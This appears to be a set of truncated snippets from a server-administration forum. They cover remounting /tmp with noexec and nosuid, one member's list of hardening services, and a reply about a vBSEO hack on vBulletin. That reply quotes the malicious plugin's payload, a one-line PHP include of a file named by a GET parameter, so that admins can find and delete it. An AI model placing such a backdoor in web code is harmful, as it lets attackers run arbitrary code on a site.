Ask your host to increase /tmp, 1gb should do
First, Make sure MySQL/Apache/
service httpd stop; service mysql stop
cd /var
dd if=/dev/zero of=tmpMnt bs=1024 count=1000000
mke2fs /var/tmpMnt
cd /
cp -R /tmp /tmp_old
mount -o loop,noexec,nosuid,rw /var/tmpMnt /tmp
chmod 0777 /tmp
cp -R...
What i Can do
General Kernel hardening, applying/compiling patches such as grsecurity
DDoS Resistance hardening / Mitagation
Custom Scripts in bash/perl to do tasks you need done to make life easier
LiteSpeed high speed performance optimization
PHP tuning / Hardening / Patches
General apache...
Who are you speaking too? me or the idiot that thinks ipb is better than vb security wise
a few bad plugins is clearly a plugin developer error, not vbulletins.,
update vbseo OR delete, your choice, ive mostly seen this hack on 3.3.0, but some other versions may be vulnerable, go to admincp in vb and go to plugins (not add/remove) and look for one named //// delete it (contents; Echo('<?php include($_GET["alfo"])?>');)
// example logs
94.121.10.8 - -...
This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
By continuing to use this site, you are consenting to our use of cookies.